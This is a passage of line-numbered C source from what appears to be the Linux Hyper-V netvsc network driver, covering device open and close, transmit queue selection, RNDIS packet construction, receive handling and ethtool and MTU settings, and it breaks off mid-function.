| 375 | netif_tx_wake_all_queues(net); 376 | 377 | rdev = nvdev->extension; 378 | 379 | if (!rdev->link_state) 380 | netif_carrier_on(net); 381 | 382 | if (vf_netdev) { 383 | /* Setting synthetic device up transparently sets 384 | * the slave as up. If open fails, then the slave will 385 | * still be offline (and not used).
386 | */ 387 | ret = dev_open(vf_netdev); 388 | if (ret) 389 | netdev_warn(net, 390 | "unable to open slave: %s: %d\n", 391 | vf_netdev->name, ret); 392 | } 393 | return 0; 394 | } 395 | 396 | static int netvsc_close(struct net_device *net) 397 | { 398 | struct net_device_context *net_device_ctx = netdev_priv(net); 399 | struct net_device *vf_netdev 400 | = rtnl_dereference(net_device_ctx->vf_netdev); 401 | struct netvsc_device *nvdev = rtnl_dereference(net_device_ctx->nvdev); 402 | int ret = 0; 403 | u32 aread, i, msec = 10, retry = 0, retry_max = 20; 404 | struct vmbus_channel *chn; 405 | 406 | netif_tx_disable(net); 407 | 408 | /* No need to close rndis filter if it is removed already */ 409 | if (!nvdev) 410 | goto out; 411 | 412 | ret = rndis_filter_close(nvdev); 413 | if (ret != 0) { 414 | netdev_err(net, "unable to close device (ret %d).\n", ret); 415 | return ret; 416 | } 417 | 418 | /* Ensure pending bytes in ring are read */ 419 | while (true) { 420 | aread = 0; 421 | for (i = 0; i < nvdev->num_chn; i++) { 422 | chn = nvdev->chan_table[i].channel; 423 | if (!chn) 424 | continue; 425 | 426 | aread = hv_get_bytes_to_read(&chn->inbound); 427 | if (aread) 428 | break; 429 | 430 | aread = hv_get_bytes_to_read(&chn->outbound); 431 | if (aread) 432 | break; 433 | } 434 | 435 | retry++; 436 | if (retry > retry_max || aread == 0) 437 | break; 438 | 439 | msleep(msec); 440 | 441 | if (msec < 1000) 442 | msec *= 2; 443 | } 444 | 445 | if (aread) { 446 | netdev_err(net, "Ring buffer not empty after closing rndis\n"); 447 | ret = -ETIMEDOUT; 448 | } 449 | 450 | out: 451 | if (vf_netdev) 452 | dev_close(vf_netdev); 453 | 454 | return ret; 455 | } 456 | 457 | static void *init_ppi_data(struct rndis_message *msg, u32 ppi_size, 458 | int pkt_type) 459 | { 460 | struct rndis_packet *rndis_pkt; 461 | struct rndis_per_packet_info *ppi; 462 | 463 | rndis_pkt = &msg->msg.pkt; 464 | rndis_pkt->data_offset += ppi_size; 465 | 466 | ppi = (struct rndis_per_packet_info *)((void *)rndis_pkt + 467 | rndis_pkt->per_pkt_info_offset + rndis_pkt->per_pkt_info_len); 468 | 469 | ppi->size = ppi_size; 470 | ppi->type = pkt_type; 471 | ppi->ppi_offset = sizeof(struct rndis_per_packet_info); 472 | 473 | rndis_pkt->per_pkt_info_len += ppi_size; 474 | 475 | return ppi; 476 | } 477 | 478 | /* Azure hosts don't support non-TCP port numbers in hashing for fragmented 479 | * packets. We can use ethtool to change UDP hash level when necessary. 
480 | */ 481 | static inline u32 netvsc_get_hash( 482 | struct sk_buff *skb, 483 | const struct net_device_context *ndc) 484 | { 485 | struct flow_keys flow; 486 | u32 hash; 487 | static u32 hashrnd __read_mostly; 488 | 489 | net_get_random_once(&hashrnd, sizeof(hashrnd)); 490 | 491 | if (!skb_flow_dissect_flow_keys(skb, &flow, 0)) 492 | return 0; 493 | 494 | if (flow.basic.ip_proto == IPPROTO_TCP || 495 | (flow.basic.ip_proto == IPPROTO_UDP && 496 | ((flow.basic.n_proto == htons(ETH_P_IP) && ndc->udp4_l4_hash) || 497 | (flow.basic.n_proto == htons(ETH_P_IPV6) && 498 | ndc->udp6_l4_hash)))) { 499 | return skb_get_hash(skb); 500 | } else { 501 | if (flow.basic.n_proto == htons(ETH_P_IP)) 502 | hash = jhash2((u32 *)&flow.addrs.v4addrs, 2, hashrnd); 503 | else if (flow.basic.n_proto == htons(ETH_P_IPV6)) 504 | hash = jhash2((u32 *)&flow.addrs.v6addrs, 8, hashrnd); 505 | else 506 | hash = 0; 507 | 508 | skb_set_hash(skb, hash, PKT_HASH_TYPE_L3); 509 | } 510 | 511 | return hash; 512 | } 513 | 514 | static inline int netvsc_get_tx_queue(struct net_device *ndev, 515 | struct sk_buff *skb, int old_idx) 516 | { 517 | const struct net_device_context *ndc = netdev_priv(ndev); 518 | struct sock *sk = skb->sk; 519 | int q_idx; 520 | 521 | q_idx = ndc->tx_send_table[netvsc_get_hash(skb, ndc) & 522 | (VRSS_SEND_TAB_SIZE - 1)]; 523 | 524 | /* If queue index changed record the new value */ 525 | if (q_idx != old_idx && 526 | sk && sk_fullsock(sk) && rcu_access_pointer(sk->sk_dst_cache)) 527 | sk_tx_queue_set(sk, q_idx); 528 | 529 | return q_idx; 530 | } 531 | 532 | /* 533 | * Select queue for transmit. 534 | * 535 | * If a valid queue has already been assigned, then use that. 536 | * Otherwise compute tx queue based on hash and the send table. 537 | * 538 | * This is basically similar to default (__netdev_pick_tx) with the added step 539 | * of using the host send_table when no other queue has been assigned. 540 | * 541 | * TODO support XPS - but get_xps_queue not exported 542 | */ 543 | static u16 netvsc_pick_tx(struct net_device *ndev, struct sk_buff *skb) 544 | { 545 | int q_idx = sk_tx_queue_get(skb->sk); 546 | 547 | if (q_idx < 0 || skb->ooo_okay || q_idx >= ndev->real_num_tx_queues) { 548 | /* If forwarding a packet, we use the recorded queue when 549 | * available for better cache locality. 550 | */ 551 | if (skb_rx_queue_recorded(skb)) 552 | q_idx = skb_get_rx_queue(skb); 553 | else 554 | q_idx = netvsc_get_tx_queue(ndev, skb, q_idx); 555 | } 556 | 557 | return q_idx; 558 | } 559 | 560 | static u16 netvsc_select_queue(struct net_device *ndev, struct sk_buff *skb, 561 | void *accel_priv, 562 | select_queue_fallback_t fallback) 563 | { 564 | struct net_device_context *ndc = netdev_priv(ndev); 565 | struct net_device *vf_netdev; 566 | u16 txq; 567 | 568 | rcu_read_lock(); 569 | vf_netdev = rcu_dereference(ndc->vf_netdev); 570 | if (vf_netdev) { 571 | txq = skb_rx_queue_recorded(skb) ? skb_get_rx_queue(skb) : 0; 572 | qdisc_skb_cb(skb)->slave_dev_queue_mapping = skb->queue_mapping; 573 | } else { 574 | txq = netvsc_pick_tx(ndev, skb); 575 | } 576 | rcu_read_unlock(); 577 | 578 | while (unlikely(txq >= ndev->real_num_tx_queues)) 579 | txq -= ndev->real_num_tx_queues; 580 | 581 | return txq; 582 | } 583 | 584 | static u32 fill_pg_buf(struct page *page, u32 offset, u32 len, 585 | struct hv_page_buffer *pb) 586 | { 587 | int j = 0; 588 | 589 | /* Deal with compound pages by ignoring unused part 590 | * of the page.
591 | */ 592 | page += (offset >> PAGE_SHIFT); 593 | offset &= ~PAGE_MASK; 594 | 595 | while (len > 0) { 596 | unsigned long bytes; 597 | 598 | bytes = PAGE_SIZE - offset; 599 | if (bytes > len) 600 | bytes = len; 601 | pb[j].pfn = page_to_pfn(page); 602 | pb[j].offset = offset; 603 | pb[j].len = bytes; 604 | 605 | offset += bytes; 606 | len -= bytes; 607 | 608 | if (offset == PAGE_SIZE && len) { 609 | page++; 610 | offset = 0; 611 | j++; 612 | } 613 | } 614 | 615 | return j + 1; 616 | } 617 | 618 | static u32 init_page_array(void *hdr, u32 len, struct sk_buff *skb, 619 | struct hv_netvsc_packet *packet, 620 | struct hv_page_buffer *pb) 621 | { 622 | u32 slots_used = 0; 623 | char *data = skb->data; 624 | int frags = skb_shinfo(skb)->nr_frags; 625 | int i; 626 | 627 | /* The packet is laid out thus: 628 | * 1. hdr: RNDIS header and PPI 629 | * 2. skb linear data 630 | * 3. skb fragment data 631 | */ 632 | slots_used += fill_pg_buf(virt_to_page(hdr), 633 | offset_in_page(hdr), 634 | len, &pb[slots_used]); 635 | 636 | packet->rmsg_size = len; 637 | packet->rmsg_pgcnt = slots_used; 638 | 639 | slots_used += fill_pg_buf(virt_to_page(data), 640 | offset_in_page(data), 641 | skb_headlen(skb), &pb[slots_used]); 642 | 643 | for (i = 0; i < frags; i++) { 644 | skb_frag_t *frag = skb_shinfo(skb)->frags + i; 645 | 646 | slots_used += fill_pg_buf(skb_frag_page(frag), 647 | frag->page_offset, 648 | skb_frag_size(frag), &pb[slots_used]); 649 | } 650 | return slots_used; 651 | } 652 | 653 | static int count_skb_frag_slots(struct sk_buff *skb) 654 | { 655 | int i, frags = skb_shinfo(skb)->nr_frags; 656 | int pages = 0; 657 | 658 | for (i = 0; i < frags; i++) { 659 | skb_frag_t *frag = skb_shinfo(skb)->frags + i; 660 | unsigned long size = skb_frag_size(frag); 661 | unsigned long offset = frag->page_offset; 662 | 663 | /* Skip unused frames from start of page */ 664 | offset &= ~PAGE_MASK; 665 | pages += PFN_UP(offset + size); 666 | } 667 | return pages; 668 | } 669 | 670 | static int netvsc_get_slots(struct sk_buff *skb) 671 | { 672 | char *data = skb->data; 673 | unsigned int offset = offset_in_page(data); 674 | unsigned int len = skb_headlen(skb); 675 | int slots; 676 | int frag_slots; 677 | 678 | slots = DIV_ROUND_UP(offset + len, PAGE_SIZE); 679 | frag_slots = count_skb_frag_slots(skb); 680 | return slots + frag_slots; 681 | } 682 | 683 | static u32 net_checksum_info(struct sk_buff *skb) 684 | { 685 | if (skb->protocol == htons(ETH_P_IP)) { 686 | struct iphdr *ip = ip_hdr(skb); 687 | 688 | if (ip->protocol == IPPROTO_TCP) 689 | return TRANSPORT_INFO_IPV4_TCP; 690 | else if (ip->protocol == IPPROTO_UDP) 691 | return TRANSPORT_INFO_IPV4_UDP; 692 | } else { 693 | struct ipv6hdr *ip6 = ipv6_hdr(skb); 694 | 695 | if (ip6->nexthdr == IPPROTO_TCP) 696 | return TRANSPORT_INFO_IPV6_TCP; 697 | else if (ip6->nexthdr == IPPROTO_UDP) 698 | return TRANSPORT_INFO_IPV6_UDP; 699 | } 700 | 701 | return TRANSPORT_INFO_NOT_IP; 702 | } 703 | 704 | /* Send skb on the slave VF device. 
*/ 705 | static int netvsc_vf_xmit(struct net_device *net, struct net_device *vf_netdev, 706 | struct sk_buff *skb) 707 | { 708 | struct net_device_context *ndev_ctx = netdev_priv(net); 709 | unsigned int len = skb->len; 710 | int rc; 711 | 712 | skb->dev = vf_netdev; 713 | skb->queue_mapping = qdisc_skb_cb(skb)->slave_dev_queue_mapping; 714 | 715 | rc = dev_queue_xmit(skb); 716 | if (likely(rc == NET_XMIT_SUCCESS || rc == NET_XMIT_CN)) { 717 | struct netvsc_vf_pcpu_stats *pcpu_stats 718 | = this_cpu_ptr(ndev_ctx->vf_stats); 719 | 720 | u64_stats_update_begin(&pcpu_stats->syncp); 721 | pcpu_stats->tx_packets++; 722 | pcpu_stats->tx_bytes += len; 723 | u64_stats_update_end(&pcpu_stats->syncp); 724 | } else { 725 | this_cpu_inc(ndev_ctx->vf_stats->tx_dropped); 726 | } 727 | 728 | return rc; 729 | } 730 | 731 | static int netvsc_start_xmit(struct sk_buff *skb, struct net_device *net) 732 | { 733 | struct net_device_context *net_device_ctx = netdev_priv(net); 734 | struct hv_netvsc_packet *packet = NULL; 735 | int ret; 736 | unsigned int num_data_pgs; 737 | struct rndis_message *rndis_msg; 738 | struct rndis_packet *rndis_pkt; 739 | struct net_device *vf_netdev; 740 | u32 rndis_msg_size; 741 | struct rndis_per_packet_info *ppi; 742 | u32 hash; 743 | struct hv_page_buffer pb[MAX_PAGE_BUFFER_COUNT]; 744 | 745 | /* if VF is present and up then redirect packets 746 | * already called with rcu_read_lock_bh 747 | */ 748 | vf_netdev = rcu_dereference_bh(net_device_ctx->vf_netdev); 749 | if (vf_netdev && netif_running(vf_netdev) && 750 | !netpoll_tx_running(net)) 751 | return netvsc_vf_xmit(net, vf_netdev, skb); 752 | 753 | /* We will at most need two pages to describe the rndis 754 | * header. We can only transmit MAX_PAGE_BUFFER_COUNT number 755 | * of pages in a single packet. If skb is scattered around 756 | * more pages we try linearizing it. 757 | */ 758 | 759 | num_data_pgs = netvsc_get_slots(skb) + 2; 760 | 761 | if (unlikely(num_data_pgs > MAX_PAGE_BUFFER_COUNT)) { 762 | ++net_device_ctx->eth_stats.tx_scattered; 763 | 764 | if (skb_linearize(skb)) 765 | goto no_memory; 766 | 767 | num_data_pgs = netvsc_get_slots(skb) + 2; 768 | if (num_data_pgs > MAX_PAGE_BUFFER_COUNT) { 769 | ++net_device_ctx->eth_stats.tx_too_big; 770 | goto drop; 771 | } 772 | } 773 | 774 | /* 775 | * Place the rndis header in the skb head room and 776 | * the skb->cb will be used for hv_netvsc_packet 777 | * structure.
778 | */ 779 | ret = skb_cow_head(skb, RNDIS_AND_PPI_SIZE); 780 | if (ret) 781 | goto no_memory; 782 | 783 | /* Use the skb control buffer for building up the packet */ 784 | BUILD_BUG_ON(sizeof(struct hv_netvsc_packet) > 785 | FIELD_SIZEOF(struct sk_buff, cb)); 786 | packet = (struct hv_netvsc_packet *)skb->cb; 787 | 788 | packet->q_idx = skb_get_queue_mapping(skb); 789 | 790 | packet->total_data_buflen = skb->len; 791 | packet->total_bytes = skb->len; 792 | packet->total_packets = 1; 793 | 794 | rndis_msg = (struct rndis_message *)skb->head; 795 | 796 | memset(rndis_msg, 0, RNDIS_AND_PPI_SIZE); 797 | 798 | /* Add the rndis header */ 799 | rndis_msg->ndis_msg_type = RNDIS_MSG_PACKET; 800 | rndis_msg->msg_len = packet->total_data_buflen; 801 | rndis_pkt = &rndis_msg->msg.pkt; 802 | rndis_pkt->data_offset = sizeof(struct rndis_packet); 803 | rndis_pkt->data_len = packet->total_data_buflen; 804 | rndis_pkt->per_pkt_info_offset = sizeof(struct rndis_packet); 805 | 806 | rndis_msg_size = RNDIS_MESSAGE_SIZE(struct rndis_packet); 807 | 808 | hash = skb_get_hash_raw(skb); 809 | if (hash != 0 && net->real_num_tx_queues > 1) { 810 | rndis_msg_size += NDIS_HASH_PPI_SIZE; 811 | ppi = init_ppi_data(rndis_msg, NDIS_HASH_PPI_SIZE, 812 | NBL_HASH_VALUE); 813 | *(u32 *)((void *)ppi + ppi->ppi_offset) = hash; 814 | } 815 | 816 | if (skb_vlan_tag_present(skb)) { 817 | struct ndis_pkt_8021q_info *vlan; 818 | 819 | rndis_msg_size += NDIS_VLAN_PPI_SIZE; 820 | ppi = init_ppi_data(rndis_msg, NDIS_VLAN_PPI_SIZE, 821 | IEEE_8021Q_INFO); 822 | 823 | vlan = (void *)ppi + ppi->ppi_offset; 824 | vlan->vlanid = skb->vlan_tci & VLAN_VID_MASK; 825 | vlan->pri = (skb->vlan_tci & VLAN_PRIO_MASK) >> 826 | VLAN_PRIO_SHIFT; 827 | } 828 | 829 | if (skb_is_gso(skb)) { 830 | struct ndis_tcp_lso_info *lso_info; 831 | 832 | rndis_msg_size += NDIS_LSO_PPI_SIZE; 833 | ppi = init_ppi_data(rndis_msg, NDIS_LSO_PPI_SIZE, 834 | TCP_LARGESEND_PKTINFO); 835 | 836 | lso_info = (void *)ppi + ppi->ppi_offset; 837 | 838 | lso_info->lso_v2_transmit.type = NDIS_TCP_LARGE_SEND_OFFLOAD_V2_TYPE; 839 | if (skb->protocol == htons(ETH_P_IP)) { 840 | lso_info->lso_v2_transmit.ip_version = 841 | NDIS_TCP_LARGE_SEND_OFFLOAD_IPV4; 842 | ip_hdr(skb)->tot_len = 0; 843 | ip_hdr(skb)->check = 0; 844 | tcp_hdr(skb)->check = 845 | ~csum_tcpudp_magic(ip_hdr(skb)->saddr, 846 | ip_hdr(skb)->daddr, 0, IPPROTO_TCP, 0); 847 | } else { 848 | lso_info->lso_v2_transmit.ip_version = 849 | NDIS_TCP_LARGE_SEND_OFFLOAD_IPV6; 850 | ipv6_hdr(skb)->payload_len = 0; 851 | tcp_hdr(skb)->check = 852 | ~csum_ipv6_magic(&ipv6_hdr(skb)->saddr, 853 | &ipv6_hdr(skb)->daddr, 0, IPPROTO_TCP, 0); 854 | } 855 | lso_info->lso_v2_transmit.tcp_header_offset = skb_transport_offset(skb); 856 | lso_info->lso_v2_transmit.mss = skb_shinfo(skb)->gso_size; 857 | } else if (skb->ip_summed == CHECKSUM_PARTIAL) { 858 | if (net_checksum_info(skb) & net_device_ctx->tx_checksum_mask) { 859 | struct ndis_tcp_ip_checksum_info *csum_info; 860 | 861 | rndis_msg_size += NDIS_CSUM_PPI_SIZE; 862 | ppi = init_ppi_data(rndis_msg, NDIS_CSUM_PPI_SIZE, 863 | TCPIP_CHKSUM_PKTINFO); 864 | 865 | csum_info = (struct ndis_tcp_ip_checksum_info *)((void *)ppi + 866 | ppi->ppi_offset); 867 | 868 | csum_info->transmit.tcp_header_offset = skb_transport_offset(skb); 869 | 870 | if (skb->protocol == htons(ETH_P_IP)) { 871 | csum_info->transmit.is_ipv4 = 1; 872 | 873 | if (ip_hdr(skb)->protocol == IPPROTO_TCP) 874 | csum_info->transmit.tcp_checksum = 1; 875 | else 876 | csum_info->transmit.udp_checksum = 1; 877 | } else { 878 | 
csum_info->transmit.is_ipv6 = 1; 879 | 880 | if (ipv6_hdr(skb)->nexthdr == IPPROTO_TCP) 881 | csum_info->transmit.tcp_checksum = 1; 882 | else 883 | csum_info->transmit.udp_checksum = 1; 884 | } 885 | } else { 886 | /* Can't do offload of this type of checksum */ 887 | if (skb_checksum_help(skb)) 888 | goto drop; 889 | } 890 | } 891 | 892 | /* Start filling in the page buffers with the rndis hdr */ 893 | rndis_msg->msg_len += rndis_msg_size; 894 | packet->total_data_buflen = rndis_msg->msg_len; 895 | packet->page_buf_cnt = init_page_array(rndis_msg, rndis_msg_size, 896 | skb, packet, pb); 897 | 898 | /* timestamp packet in software */ 899 | skb_tx_timestamp(skb); 900 | 901 | ret = netvsc_send(net_device_ctx, packet, rndis_msg, pb, skb); 902 | if (likely(ret == 0)) 903 | return NETDEV_TX_OK; 904 | 905 | if (ret == -EAGAIN) { 906 | ++net_device_ctx->eth_stats.tx_busy; 907 | return NETDEV_TX_BUSY; 908 | } 909 | 910 | if (ret == -ENOSPC) 911 | ++net_device_ctx->eth_stats.tx_no_space; 912 | 913 | drop: 914 | dev_kfree_skb_any(skb); 915 | net->stats.tx_dropped++; 916 | 917 | return NETDEV_TX_OK; 918 | 919 | no_memory: 920 | ++net_device_ctx->eth_stats.tx_no_memory; 921 | goto drop; 922 | } 923 | 924 | /* 925 | * netvsc_linkstatus_callback - Link up/down notification 926 | */ 927 | void netvsc_linkstatus_callback(struct hv_device *device_obj, 928 | struct rndis_message *resp) 929 | { 930 | struct rndis_indicate_status *indicate = &resp->msg.indicate_status; 931 | struct net_device *net; 932 | struct net_device_context *ndev_ctx; 933 | struct netvsc_reconfig *event; 934 | unsigned long flags; 935 | 936 | net = hv_get_drvdata(device_obj); 937 | 938 | if (!net) 939 | return; 940 | 941 | ndev_ctx = netdev_priv(net); 942 | 943 | /* Update the physical link speed when changing to another vSwitch */ 944 | if (indicate->status == RNDIS_STATUS_LINK_SPEED_CHANGE) { 945 | u32 speed; 946 | 947 | speed = *(u32 *)((void *)indicate 948 | + indicate->status_buf_offset) / 10000; 949 | ndev_ctx->speed = speed; 950 | return; 951 | } 952 | 953 | /* Handle these link change statuses below */ 954 | if (indicate->status != RNDIS_STATUS_NETWORK_CHANGE && 955 | indicate->status != RNDIS_STATUS_MEDIA_CONNECT && 956 | indicate->status != RNDIS_STATUS_MEDIA_DISCONNECT) 957 | return; 958 | 959 | if (net->reg_state != NETREG_REGISTERED) 960 | return; 961 | 962 | event = kzalloc(sizeof(*event), GFP_ATOMIC); 963 | if (!event) 964 | return; 965 | event->event = indicate->status; 966 | 967 | spin_lock_irqsave(&ndev_ctx->lock, flags); 968 | list_add_tail(&event->list, &ndev_ctx->reconfig_events); 969 | spin_unlock_irqrestore(&ndev_ctx->lock, flags); 970 | 971 | schedule_delayed_work(&ndev_ctx->dwork, 0); 972 | } 973 | 974 | static struct sk_buff *netvsc_alloc_recv_skb(struct net_device *net, 975 | struct napi_struct *napi, 976 | const struct ndis_tcp_ip_checksum_info *csum_info, 977 | const struct ndis_pkt_8021q_info *vlan, 978 | void *data, u32 buflen) 979 | { 980 | struct sk_buff *skb; 981 | 982 | skb = napi_alloc_skb(napi, buflen); 983 | if (!skb) 984 | return skb; 985 | 986 | /* 987 | * Copy to skb. This copy is needed here since the memory pointed by 988 | * hv_netvsc_packet cannot be deallocated 989 | */ 990 | skb_put_data(skb, data, buflen); 991 | 992 | skb->protocol = eth_type_trans(skb, net); 993 | 994 | /* skb is already created with CHECKSUM_NONE */ 995 | skb_checksum_none_assert(skb); 996 | 997 | /* 998 | * In Linux, the IP checksum is always checked. 999 | * Do L4 checksum offload if enabled and present. 
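 * (Concretely: a host-validated TCP/UDP checksum becomes CHECKSUM_UNNECESSARY
 * below; the IP header checksum itself is left for the stack to verify.)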
1000 | */ 1001 | if (csum_info && (net->features & NETIF_F_RXCSUM)) { 1002 | if (csum_info->receive.tcp_checksum_succeeded || 1003 | csum_info->receive.udp_checksum_succeeded) 1004 | skb->ip_summed = CHECKSUM_UNNECESSARY; 1005 | } 1006 | 1007 | if (vlan) { 1008 | u16 vlan_tci = vlan->vlanid | (vlan->pri << VLAN_PRIO_SHIFT); 1009 | 1010 | __vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q), 1011 | vlan_tci); 1012 | } 1013 | 1014 | return skb; 1015 | } 1016 | 1017 | /* 1018 | * netvsc_recv_callback - Callback when we receive a packet from the 1019 | * "wire" on the specified device. 1020 | */ 1021 | int netvsc_recv_callback(struct net_device *net, 1022 | struct vmbus_channel *channel, 1023 | void *data, u32 len, 1024 | const struct ndis_tcp_ip_checksum_info *csum_info, 1025 | const struct ndis_pkt_8021q_info *vlan) 1026 | { 1027 | struct net_device_context *net_device_ctx = netdev_priv(net); 1028 | struct netvsc_device *net_device; 1029 | u16 q_idx = channel->offermsg.offer.sub_channel_index; 1030 | struct netvsc_channel *nvchan; 1031 | struct sk_buff *skb; 1032 | struct netvsc_stats *rx_stats; 1033 | 1034 | if (net->reg_state != NETREG_REGISTERED) 1035 | return NVSP_STAT_FAIL; 1036 | 1037 | rcu_read_lock(); 1038 | net_device = rcu_dereference(net_device_ctx->nvdev); 1039 | if (unlikely(!net_device)) 1040 | goto drop; 1041 | 1042 | nvchan = &net_device->chan_table[q_idx]; 1043 | 1044 | /* Allocate a skb - TODO direct I/O to pages? */ 1045 | skb = netvsc_alloc_recv_skb(net, &nvchan->napi, 1046 | csum_info, vlan, data, len); 1047 | if (unlikely(!skb)) { 1048 | drop: 1049 | ++net->stats.rx_dropped; 1050 | rcu_read_unlock(); 1051 | return NVSP_STAT_FAIL; 1052 | } 1053 | 1054 | skb_record_rx_queue(skb, q_idx); 1055 | 1056 | /* 1057 | * Even if injecting the packet, record the statistics 1058 | * on the synthetic device because modifying the VF device 1059 | * statistics will not work correctly. 
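 * (VF traffic is counted separately in the per-cpu netvsc_vf_pcpu_stats;
 * see netvsc_vf_handle_frame() and netvsc_get_vf_stats() in this file.)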
1060 | */ 1061 | rx_stats = &nvchan->rx_stats; 1062 | u64_stats_update_begin(&rx_stats->syncp); 1063 | rx_stats->packets++; 1064 | rx_stats->bytes += len; 1065 | 1066 | if (skb->pkt_type == PACKET_BROADCAST) 1067 | ++rx_stats->broadcast; 1068 | else if (skb->pkt_type == PACKET_MULTICAST) 1069 | ++rx_stats->multicast; 1070 | u64_stats_update_end(&rx_stats->syncp); 1071 | 1072 | napi_gro_receive(&nvchan->napi, skb); 1073 | rcu_read_unlock(); 1074 | 1075 | return 0; 1076 | } 1077 | 1078 | static void netvsc_get_drvinfo(struct net_device *net, 1079 | struct ethtool_drvinfo *info) 1080 | { 1081 | strlcpy(info->driver, KBUILD_MODNAME, sizeof(info->driver)); 1082 | strlcpy(info->fw_version, "N/A", sizeof(info->fw_version)); 1083 | } 1084 | 1085 | static void netvsc_get_channels(struct net_device *net, 1086 | struct ethtool_channels *channel) 1087 | { 1088 | struct net_device_context *net_device_ctx = netdev_priv(net); 1089 | struct netvsc_device *nvdev = rtnl_dereference(net_device_ctx->nvdev); 1090 | 1091 | if (nvdev) { 1092 | channel->max_combined = nvdev->max_chn; 1093 | channel->combined_count = nvdev->num_chn; 1094 | } 1095 | } 1096 | 1097 | static int netvsc_set_channels(struct net_device *net, 1098 | struct ethtool_channels *channels) 1099 | { 1100 | struct net_device_context *net_device_ctx = netdev_priv(net); 1101 | struct hv_device *dev = net_device_ctx->device_ctx; 1102 | struct netvsc_device *nvdev = rtnl_dereference(net_device_ctx->nvdev); 1103 | unsigned int orig, count = channels->combined_count; 1104 | struct netvsc_device_info device_info; 1105 | bool was_opened; 1106 | int ret = 0; 1107 | 1108 | /* We do not support separate count for rx, tx, or other */ 1109 | if (count == 0 || 1110 | channels->rx_count || channels->tx_count || channels->other_count) 1111 | return -EINVAL; 1112 | 1113 | if (!nvdev || nvdev->destroy) 1114 | return -ENODEV; 1115 | 1116 | if (nvdev->nvsp_version < NVSP_PROTOCOL_VERSION_5) 1117 | return -EINVAL; 1118 | 1119 | if (count > nvdev->max_chn) 1120 | return -EINVAL; 1121 | 1122 | orig = nvdev->num_chn; 1123 | was_opened = rndis_filter_opened(nvdev); 1124 | if (was_opened) 1125 | rndis_filter_close(nvdev); 1126 | 1127 | memset(&device_info, 0, sizeof(device_info)); 1128 | device_info.num_chn = count; 1129 | device_info.ring_size = ring_size; 1130 | device_info.send_sections = nvdev->send_section_cnt; 1131 | device_info.send_section_size = nvdev->send_section_size; 1132 | device_info.recv_sections = nvdev->recv_section_cnt; 1133 | device_info.recv_section_size = nvdev->recv_section_size; 1134 | 1135 | rndis_filter_device_remove(dev, nvdev); 1136 | 1137 | nvdev = rndis_filter_device_add(dev, &device_info); 1138 | if (IS_ERR(nvdev)) { 1139 | ret = PTR_ERR(nvdev); 1140 | device_info.num_chn = orig; 1141 | nvdev = rndis_filter_device_add(dev, &device_info); 1142 | 1143 | if (IS_ERR(nvdev)) { 1144 | netdev_err(net, "restoring channel setting failed: %ld\n", 1145 | PTR_ERR(nvdev)); 1146 | return ret; 1147 | } 1148 | } 1149 | 1150 | if (was_opened) 1151 | rndis_filter_open(nvdev); 1152 | 1153 | /* We may have missed link change notifications */ 1154 | net_device_ctx->last_reconfig = 0; 1155 | schedule_delayed_work(&net_device_ctx->dwork, 0); 1156 | 1157 | return ret; 1158 | } 1159 | 1160 | static bool 1161 | netvsc_validate_ethtool_ss_cmd(const struct ethtool_link_ksettings *cmd) 1162 | { 1163 | struct ethtool_link_ksettings diff1 = *cmd; 1164 | struct ethtool_link_ksettings diff2 = {}; 1165 | 1166 | diff1.base.speed = 0; 1167 | diff1.base.duplex = 0; 1168 | /* 
advertising and cmd are usually set */ 1169 | ethtool_link_ksettings_zero_link_mode(&diff1, advertising); 1170 | diff1.base.cmd = 0; 1171 | /* We set port to PORT_OTHER */ 1172 | diff2.base.port = PORT_OTHER; 1173 | 1174 | return !memcmp(&diff1, &diff2, sizeof(diff1)); 1175 | } 1176 | 1177 | static void netvsc_init_settings(struct net_device *dev) 1178 | { 1179 | struct net_device_context *ndc = netdev_priv(dev); 1180 | 1181 | ndc->udp4_l4_hash = true; 1182 | ndc->udp6_l4_hash = true; 1183 | 1184 | ndc->speed = SPEED_UNKNOWN; 1185 | ndc->duplex = DUPLEX_FULL; 1186 | } 1187 | 1188 | static int netvsc_get_link_ksettings(struct net_device *dev, 1189 | struct ethtool_link_ksettings *cmd) 1190 | { 1191 | struct net_device_context *ndc = netdev_priv(dev); 1192 | 1193 | cmd->base.speed = ndc->speed; 1194 | cmd->base.duplex = ndc->duplex; 1195 | cmd->base.port = PORT_OTHER; 1196 | 1197 | return 0; 1198 | } 1199 | 1200 | static int netvsc_set_link_ksettings(struct net_device *dev, 1201 | const struct ethtool_link_ksettings *cmd) 1202 | { 1203 | struct net_device_context *ndc = netdev_priv(dev); 1204 | u32 speed; 1205 | 1206 | speed = cmd->base.speed; 1207 | if (!ethtool_validate_speed(speed) || 1208 | !ethtool_validate_duplex(cmd->base.duplex) || 1209 | !netvsc_validate_ethtool_ss_cmd(cmd)) 1210 | return -EINVAL; 1211 | 1212 | ndc->speed = speed; 1213 | ndc->duplex = cmd->base.duplex; 1214 | 1215 | return 0; 1216 | } 1217 | 1218 | static int netvsc_change_mtu(struct net_device *ndev, int mtu) 1219 | { 1220 | struct net_device_context *ndevctx = netdev_priv(ndev); 1221 | struct net_device *vf_netdev = rtnl_dereference(ndevctx->vf_netdev); 1222 | struct netvsc_device *nvdev = rtnl_dereference(ndevctx->nvdev); 1223 | struct hv_device *hdev = ndevctx->device_ctx; 1224 | int orig_mtu = ndev->mtu; 1225 | struct netvsc_device_info device_info; 1226 | bool was_opened; 1227 | int ret = 0; 1228 | 1229 | if (!nvdev || nvdev->destroy) 1230 | return -ENODEV; 1231 | 1232 | /* Change MTU of underlying VF netdev first. 
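 * If the VF rejects the new MTU, return early and leave the synthetic
 * device untouched.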
*/ 1233 | if (vf_netdev) { 1234 | ret = dev_set_mtu(vf_netdev, mtu); 1235 | if (ret) 1236 | return ret; 1237 | } 1238 | 1239 | netif_device_detach(ndev); 1240 | was_opened = rndis_filter_opened(nvdev); 1241 | if (was_opened) 1242 | rndis_filter_close(nvdev); 1243 | 1244 | memset(&device_info, 0, sizeof(device_info)); 1245 | device_info.ring_size = ring_size; 1246 | device_info.num_chn = nvdev->num_chn; 1247 | device_info.send_sections = nvdev->send_section_cnt; 1248 | device_info.send_section_size = nvdev->send_section_size; 1249 | device_info.recv_sections = nvdev->recv_section_cnt; 1250 | device_info.recv_section_size = nvdev->recv_section_size; 1251 | 1252 | rndis_filter_device_remove(hdev, nvdev); 1253 | 1254 | ndev->mtu = mtu; 1255 | 1256 | nvdev = rndis_filter_device_add(hdev, &device_info); 1257 | if (IS_ERR(nvdev)) { 1258 | ret = PTR_ERR(nvdev); 1259 | 1260 | /* Attempt rollback to original MTU */ 1261 | ndev->mtu = orig_mtu; 1262 